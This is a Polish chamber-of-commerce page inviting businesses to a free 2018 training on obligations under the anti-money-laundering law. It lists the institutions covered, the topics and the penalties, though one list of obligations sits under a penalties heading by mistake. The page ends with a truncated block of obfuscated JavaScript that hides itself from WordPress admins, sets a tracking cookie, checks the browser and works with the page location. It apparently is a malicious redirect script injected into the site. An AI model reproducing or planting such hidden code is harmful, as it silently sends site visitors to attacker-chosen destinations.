Szkolenie z zakresu wypełniania obowiązków przeciwdziałaniu praniu brudnych pieniędzy i finansowaniu terroryzmu | Północna Izba Gospodarcza w Koszalinie

Północna Izba Gospodarcza w Koszalinie ma przyjemność zaprosić na bezpłatne szkolenie, które odbędzie się dnia 6 września 2018r. (Informacje o miejscu i godzinie podamy w najbliższym czasie).

Ekspert firmy Incaso Group Specjaliści AML w Polsce przedstawi informacje z zakresu wypełniania obowiązków wynikających z najnowszej Ustawy o przeciwdziałaniu praniu brudnych pieniędzy i finansowaniu terroryzmu, która weszła w życie z dniem 13 lipca 2018r.

Instytucje i firmy które będą obowiązywały nowe przepisy to, m.in.:

biura rachunkowe, kancelarie podatkowe, kantory, kancelarie notarialne, biegli rewidenci, pośrednicy obrotu nieruchomościami, komisy, lombardy, radcy prawni, pośrednicy ubezpieczeniowi, stowarzyszenia, fundacje, banki, towarzystwa funduszy inwestycyjnych oraz przedsiębiorcy przyjmujący i przekazujący płatności w gotówce.

Podczas spotkania omówione zostaną m.in. takie zagadnienia jak:

 1. Pranie brudnych pieniędzy – o co w tym chodzi,
 2. Instytucje obowiązane – kto i dlaczego,
 3. Obowiązki wynikające z Ustawy o przeciwdziałaniu praniu brudnych pieniędzy i finansowaniu terroryzmu,
 4. Kto jak może kontrolować Instytucje Obowiązane,
 5. Co mi grozi, gdy nie wypełnię obowiązków ustawowych,
 6. Jak powinien wyglądać kompletny zestaw narzędzi iAML.

Ustawa nakłada na powyższe instytucje rozbudowane wymagania związane z przeciwdziałaniem praniu pieniędzy i finansowaniu terroryzmu, w szczególności:

Jeśli firma nie wypełnia we właściwy sposób wszystkich obowiązków ustawowych związanych z przeciwdziałaniem praniu pieniędzy i finansowaniu terroryzmu, jest narażona na:

 1. Uczestnictwo w certyfikowanych szkoleniach okresowych.
 2. Przygotowanie i wdrożenie procedury wewnętrznej.
 3. Regularna analiza klientów i transakcji.
 4. Raportowanie transakcji podejrzanych i ponadprogowych do GIIF.

Bądź świadomy i bezpieczny!

Jeśli firma nie wypełnia we właściwy sposób wszystkich obowiązków ustawowych związanych z przeciwdziałaniem praniu pieniędzy i finansowaniu terroryzmu, jest narażona na:

 1. Kary administracyjne, w tym bardzo wysokie kary finansowe.
 2. Sankcje karne, czyli grzywnę i/lub karę pozbawienia wolności.
 3. Zakaz wykonywania zawodu.

Incaso Group Specjaliści AML w Polsce, pomaga polskim przedsiębiorcom wdrażać rozwiązania zgodne z najnowszymi przepisami. Zapewnia procedury wewnętrzne umożliwiające uniknięcie kar za nieodpowiednie analizowanie transakcji. Szkoli właścicieli i pracowników w zakresie przestrzegania tych procedur. Udostępnia narzędzia analityczne, które w pełni zabezpieczają Państwa interesy w przypadku kontroli. Zapraszamy do kontaktu z Panią Emilia Szymańczyk tel. 533 376 373.

Zainteresowanych Państwa Prosimy o potwierdzenie obecności do Biura Izby, telefonicznie 537 184 630 lub mailowo koszalin@izba.info.

 

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m